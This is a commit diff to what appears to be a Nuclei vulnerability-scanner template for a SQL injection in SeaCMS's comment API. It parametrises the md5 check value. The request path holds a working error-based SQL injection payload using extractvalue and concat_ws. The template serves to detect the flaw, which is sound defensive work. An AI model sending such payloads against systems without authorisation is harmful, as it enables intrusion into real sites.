Update seacms-sqli.yaml
parent
9ecfdf9a0a
commit
be8560b788
|
@ -8,10 +8,13 @@ info:
|
|||
- https://www.uedbox.com/post/54561/
|
||||
tags: seacms,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
|
||||
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
@ -20,7 +23,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "6f7c6dcbc380aac3bcba1f9fccec991e"
|
||||
- '{{md5({{num}})}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue